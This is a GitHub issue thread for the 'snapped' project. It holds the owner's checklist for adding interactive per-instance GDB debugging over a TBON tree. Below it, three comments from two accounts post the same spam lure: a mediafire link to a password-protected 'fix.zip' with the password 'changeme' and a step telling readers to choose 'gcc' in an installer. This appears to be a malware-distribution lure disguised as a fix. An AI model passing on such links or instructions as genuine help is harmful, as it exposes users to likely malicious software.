### ISSUE TITLE
Interactive Debugging

### ISSUE THREAD

**Issue by besnardjb** [besnardjb/snapped#3]
Nothing prevents snapped from connecting to individual debuggers and we want to do so:

- [ ] Implement per-GDB command in the TBON ranking is already in DFS compatible range it is a matter of adding routing
- [ ] Implement Ranges in debugger commands
- [ ] Add routing logic to send a command to a single instance
- [ ] Add a snapped prompt using deadline support (https://docs.rs/rustyline/latest/rustyline/)
- [ ] Allow to enter a state (each leaf in the tree)
- [ ] Collect the GDB output and send it up at each command
- [ ] And then allow to join GDB instances and hop from one to another

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
